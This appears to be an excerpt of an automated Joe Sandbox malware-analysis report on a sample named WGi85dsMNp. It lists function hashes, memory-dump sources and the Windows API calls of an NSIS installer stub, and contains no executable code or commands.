                                                                                                      • Opcode Fuzzy Hash: 9a302fcedf224cee6a9cc2054c3a55f28c2de2dfd8bc39c44db740af636776ff
                                                                                                      • Instruction Fuzzy Hash: 20E0D831D113578EC7129FB0D8044DDBB30FE83310B0142A7D0147B050EB34194EC762
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d95ee2e36a9c519f2bd3e0dbcc67960b12874c8e9d633ccbb7077f96e2572bd6
                                                                                                      • Instruction ID: a79f09666283944d42a229c3b09a4a9f3e63df1b908217666df398eb39841c8f
                                                                                                      • Opcode Fuzzy Hash: d95ee2e36a9c519f2bd3e0dbcc67960b12874c8e9d633ccbb7077f96e2572bd6
                                                                                                      • Instruction Fuzzy Hash: 9FE0B630029E56DFE3552F60ACAC6BA7BB4FB0B317FC42C15A80E56422DB7C4450CB55
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 55f089b5f5a49e0599eb63bebb1dace9dec2463b93e0b4e768d11eea263b6b47
                                                                                                      • Instruction ID: 8454fc00e88eb2dd2b7e83ec746076d614f018a41241e7f6ed6438b9fde3d9b9
                                                                                                      • Opcode Fuzzy Hash: 55f089b5f5a49e0599eb63bebb1dace9dec2463b93e0b4e768d11eea263b6b47
                                                                                                      • Instruction Fuzzy Hash: 83E09274D05208DFC704EFB8E44869CBBF4EB49301F6080BAD804A3351EB318E52CB40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7c558cc39819e034431a0ee7b0f84aacc075a6db457739eac980aae47ba1e018
                                                                                                      • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                                      • Opcode Fuzzy Hash: 7c558cc39819e034431a0ee7b0f84aacc075a6db457739eac980aae47ba1e018
                                                                                                      • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f11ddd29d66bc5058052c8564562cd15f4d0483c8de124f904ccd31299556f22
                                                                                                      • Instruction ID: 49a455948d6b5299aed4516c2f7646b994dbbb4fde6c44bee41639bcb3a7f54e
                                                                                                      • Opcode Fuzzy Hash: f11ddd29d66bc5058052c8564562cd15f4d0483c8de124f904ccd31299556f22
                                                                                                      • Instruction Fuzzy Hash: A1E0C23104C3C40EC607F731EE545893F6E9F81204F1444A9D0050B56BEA7C2E4E9B61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 027a6ff73fd0f6622f6c5a2e1ae02d83dbd74481718b89c9d5be79968739aaaf
                                                                                                      • Instruction ID: f2e51bf75b538353ae88a240a1d57bc62679f4f4cf054ba5a6c92de8396c32e9
                                                                                                      • Opcode Fuzzy Hash: 027a6ff73fd0f6622f6c5a2e1ae02d83dbd74481718b89c9d5be79968739aaaf
                                                                                                      • Instruction Fuzzy Hash: D2C08C312B4904CFE700DE2CE400BC373A8EF4AB14FA024A0E809DFA61C32AFC018A08
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 817bb52a4a8189b0fc4ec7726e83cec88e7308417f86d399926eb195dcb20a72
                                                                                                      • Instruction ID: ac3eacb7c8d8f0a4ede675a5c42f927971ab596706c5bb73d2a8530ebe803afd
                                                                                                      • Opcode Fuzzy Hash: 817bb52a4a8189b0fc4ec7726e83cec88e7308417f86d399926eb195dcb20a72
                                                                                                      • Instruction Fuzzy Hash: 4DD0673AB40018AFCB049F98EC808DDFB76FB98221B048116F915A3261C6319965DB50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5b7464106ef70b06c94e9011503a196f864b699a380b14405c15852a173fc924
                                                                                                      • Instruction ID: 7c3a928bf1d6dfde52d0b2775d1829fc2f613c61945f8be002bd70a7f4eacd4c
                                                                                                      • Opcode Fuzzy Hash: 5b7464106ef70b06c94e9011503a196f864b699a380b14405c15852a173fc924
                                                                                                      • Instruction Fuzzy Hash: 51C012322455201B561CA21DB944CDE56A9CDC63117A18976A505C61184D54994B81C4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 175d2652b85c947f0a59974e9fa32b53f63ac11379f3af119ec9fcedfca46fe3
                                                                                                      • Instruction ID: 63bb9376b0b4caf77bb1aaccd81a4e60e6976befcd3e511e3295cbb37a25fbd7
                                                                                                      • Opcode Fuzzy Hash: 175d2652b85c947f0a59974e9fa32b53f63ac11379f3af119ec9fcedfca46fe3
                                                                                                      • Instruction Fuzzy Hash: 6ED0C9708162089FC744DFA8E806AA9B779E747312F4051A9A40863251DB755D20D699
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1858c2598eadcf6c54d87ef88a6d005e4bb9274fbefbecc46d678dce59d784ee
                                                                                                      • Instruction ID: 7613446bb5e2cd31eb69eba5c3afc4415b864e226ceae56deaa2d9ffc5d2a01b
                                                                                                      • Opcode Fuzzy Hash: 1858c2598eadcf6c54d87ef88a6d005e4bb9274fbefbecc46d678dce59d784ee
                                                                                                      • Instruction Fuzzy Hash: 73D0A71134E7D40FE707D3347454D5D7F704E8224074549E6D15CCB4E6D6494A4E8747
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f5872efa960adbe3fa15e9323f5de68ea31fc61779092844ab95c576afd65ead
                                                                                                      • Instruction ID: a2c4ee37fdb851183b1ddeced5345f5e28d193366cb486a40155d951f4ef843d
                                                                                                      • Opcode Fuzzy Hash: f5872efa960adbe3fa15e9323f5de68ea31fc61779092844ab95c576afd65ead
                                                                                                      • Instruction Fuzzy Hash: 50C01278019E098BE2082B50AC0CBB9B6A8B747313FC82910A409028318BB88424D654
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ad35ea5f3809056bf118472d569fb22e7ff037fdb486cf92dc9d55aee50c62b1
                                                                                                      • Instruction ID: babb0a3f05f066893ff36105fa4e29890d7b8410ea06cadd5f1eb54387e9fd50
                                                                                                      • Opcode Fuzzy Hash: ad35ea5f3809056bf118472d569fb22e7ff037fdb486cf92dc9d55aee50c62b1
                                                                                                      • Instruction Fuzzy Hash: C7C08C302A87088FE200AA1DC988E6133ACEF86B04F6058E0F5048B635CB62FC008A04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c385fb274e093567ecbd88fef34581c6826040271664045d3b0e7b05af9ccb53
                                                                                                      • Instruction ID: ad7fba3f01d60560e6998f5e7fab00fab504b478beea884960173eadbba0dcbd
                                                                                                      • Opcode Fuzzy Hash: c385fb274e093567ecbd88fef34581c6826040271664045d3b0e7b05af9ccb53
                                                                                                      • Instruction Fuzzy Hash: 3CC012300443084EC549FB65EF45955776EAF802047648560A0060657FEFB85D5B8B90
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                      • GetVersion.KERNEL32 ref: 004034CE
                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                      • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                      • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                      • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                      • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                      • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                      • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                      • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                      • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                      • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                      • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                      • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                      • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                      • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                      • CopyFileW.KERNEL32(00438800,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                      • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                      • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                      • API String ID: 3441113951-334447862
                                                                                                      • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                      • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                      • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                      • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                      • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                      • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                      • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                      • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                      • String ID: $M$N
                                                                                                      • API String ID: 1638840714-813528018
                                                                                                      • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                      • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                      • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                      • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                      • API String ID: 0-1947560563
                                                                                                      • Opcode ID: 31997e9385a4362904867054666d8c64b9fe5627e53888d463745529cd24de3c
                                                                                                      • Instruction ID: 3ce36c61d4762fcc1c6e674ab415442093bb23feedfa46b29bb29231b88636b1
                                                                                                      • Opcode Fuzzy Hash: 31997e9385a4362904867054666d8c64b9fe5627e53888d463745529cd24de3c
                                                                                                      • Instruction Fuzzy Hash: 5F327D74A012288FDB58DF69C994BDDBBF2BF89300F1080A9D909A7361DB759E85DF10
                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNEL32(?,?,00437800,75922EE0,00000000), ref: 00405B23
                                                                                                      • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B6B
                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B8E
                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B94
                                                                                                      • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405BA4
                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                      • String ID: 0WB$\*.*
                                                                                                      • API String ID: 2035342205-351390296
                                                                                                      • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                      • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                      • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                      • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                      • API String ID: 0-455001714
                                                                                                      • Opcode ID: 82c72ab26ab5dbb68fb638f338c521ed01749784ff7ff457ca61b238a3c85994
                                                                                                      • Instruction ID: 77ea6dab67c348db02ed51537b166c90664d90c2666e22c059b7b45bb566d5c1
                                                                                                      • Opcode Fuzzy Hash: 82c72ab26ab5dbb68fb638f338c521ed01749784ff7ff457ca61b238a3c85994
                                                                                                      • Instruction Fuzzy Hash: EC028BB4E012188FDB58DF69C994B9DBBF2BF89300F1081A9D809A7365DB759E85CF10
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $z5$$z5$$z5$$z5$<04
                                                                                                      • API String ID: 0-974276758
                                                                                                      • Opcode ID: 5ba61a5774a6c28040cb9fd86adca9fa7bd4098009f01c668437eb939ec7f376
                                                                                                      • Instruction ID: 72e926f9f7cd82e9937916a2d4d7a8e741b2ad3b6407605c464e8bb7b0f6886c
                                                                                                      • Opcode Fuzzy Hash: 5ba61a5774a6c28040cb9fd86adca9fa7bd4098009f01c668437eb939ec7f376
                                                                                                      • Instruction Fuzzy Hash: 32F14C75A00309CFEB04EFA9C848B9DBBF1FF48304F168559D409AB269DB76E945CB90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                      • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                      • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                      • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0), ref: 00406736
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                      • String ID: xgB
                                                                                                      • API String ID: 2295610775-399326502
                                                                                                      • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                      • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                      • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                      • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
